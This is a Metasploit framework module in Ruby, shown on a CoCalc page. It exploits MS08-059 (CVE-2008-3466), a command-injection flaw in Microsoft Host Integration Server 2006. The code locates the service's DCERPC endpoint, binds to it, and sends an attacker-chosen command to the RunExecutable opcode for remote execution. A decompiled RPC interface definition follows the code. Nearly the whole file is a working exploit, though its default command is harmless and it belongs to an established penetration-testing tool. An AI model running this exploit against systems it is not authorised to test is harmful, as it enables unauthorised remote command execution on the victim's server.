Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/ms/ms08_059_his2006.rb
19852 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::DCERPC

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Microsoft Host Integration Server 2006 Command Execution Vulnerability',

14
        'Description' => %q{

15
          This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006.

16
        },

17
        'DefaultOptions' => {

18
          'DCERPC::ReadTimeout' => 300 # Long-running RPC calls

19
        },

20
        'Author' => [ 'MC' ],

21
        'License' => MSF_LICENSE,

22
        'References' => [

23
          [ 'MSB', 'MS08-059' ],

24
          [ 'CVE', '2008-3466' ],

25
          [ 'OSVDB', '49068' ],

26
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=745' ],

27
        ],

28
        'DisclosureDate' => '2008-10-14',

29
        'Notes' => {

30
          'Stability' => [CRASH_SAFE],

31
          'SideEffects' => [IOC_IN_LOGS],

32
          'Reliability' => []

33
        }

34
      )

35
    )

36


37
    register_options(

38
      [

39
        Opt::RPORT(0),

40
        OptString.new('COMMAND', [ true, 'The command to execute', 'cmd.exe']),

41
        OptString.new('ARGS', [ true, 'The arguments to the command', '/c echo metasploit > metasploit.txt'])

42
      ]

43
    )

44
  end

45


46
  def run

47
    dport = datastore['RPORT'].to_i

48


49
    if (dport != 0)

50
      print_status('Could not use automatic target when the remote port is given')

51
      return

52
    end

53


54
    if (dport == 0)

55


56
      dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.0', 'ncacn_ip_tcp')

57
      dport ||= dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.1', 'ncacn_ip_tcp')

58


59
      if !dport

60
        print_status('Could not determine the RPC port used by the Service.')

61
        return

62
      end

63


64
      print_status("Discovered Host Integration Server RPC service on port #{dport}")

65
    end

66


67
    connect(true, { 'RPORT' => dport })

68


69
    dcerpc_handle('ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])

70
    print_status("Binding to #{handle} ...")

71


72
    dcerpc_bind(handle)

73
    print_status("Bound to #{handle} ...")

74


75
    cmd = NDR.string(datastore['COMMAND'].to_s) + NDR.string(datastore['ARGS'].to_s)

76


77
    print_status("Sending command: #{datastore['COMMAND']} #{datastore['ARGS']}")

78


79
    begin

80
      dcerpc_call(0x01, cmd)

81
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse => e

82
      vprint_error(e.message)

83
    end

84


85
    disconnect

86
  end

87
end

88


89
=begin

90
/*

91
 * IDL code generated by mIDA v1.0.8

92
 * Copyright (C) 2006, Tenable Network Security

93
 * http://cgi.tenablesecurity.com/tenable/mida.php

94
 *

95
 *

96
 * Decompilation information:

97
 * RPC stub type: inline

98
 */

99


100
[

101
 uuid(ed6ee250-e0d1-11cf-925a-00aa00c006c1),

102
 version(1.1)

103
]

104


105
interface mIDA_interface

106
{

107


108
unknown _SnaRpcService_PingServer (

109
);

110


111


112
/* opcode: 0x01, address: 0x01002CBB */

113


114
small   _SnaRpcService_RunExecutable (

115
 [in][string] char arg_1,

116
 [in][string] char arg_2

117
);

118


119
/* opcode: 0x02, address: 0x01002F0B */

120


121
long   _SnaRpcService_CallRemoteDll (

122
 [in] long  arg_1,

123
 [in][size_is(arg_1)] byte arg_2[],

124
 [in] long  arg_3,

125
 [in][size_is(arg_1)] byte arg_4[]

126
);

127


128
unknown _SnaRpcService_GetInstalledDrives (

129
);

130


131
unknown _SnaRpcService_ServiceTableUpdate (

132
);

133


134


135
/* opcode: 0x05, address: 0x0100363C */

136


137
long   _SnaRpcService_GetWindowsVersion (

138
 [in] long  arg_1,

139
 [in, out][size_is(arg_1)] byte arg_2[]

140
);

141


142


143
/* opcode: 0x06, address: 0x01003942 */

144


145
small   _SnaRpcService_RunExecutableEx (

146
 [in][string] char arg_1,

147
 [in][string] char arg_2,

148
 [in][string] char arg_3

149
);

150


151


152
/* opcode: 0x07, address: 0x01003BAB */

153


154
long   _SnaRpcService_GetDLCMediaType (

155
 [in][string] char arg_1,

156
 [out][ref] long * arg_2

157
);

158


159


160
/* opcode: 0x08, address: 0x01003E29 */

161


162
small   _SnaRpcService_UserHasAccess (

163
 [in] long  arg_1

164
);

165


166


167
/* opcode: 0x09, address: 0x01004061 */

168


169
small   _SnaRpcService_ConfigureHisService (

170
 [in][string] char arg_1

171
);

172


173


174
/* opcode: 0x0A, address: 0x01004272 */

175


176
small   _SnaRpcService_ConfigureServiceAccount (

177
 [in][string] char arg_1

178
);

179


180
}

181
=end

182


183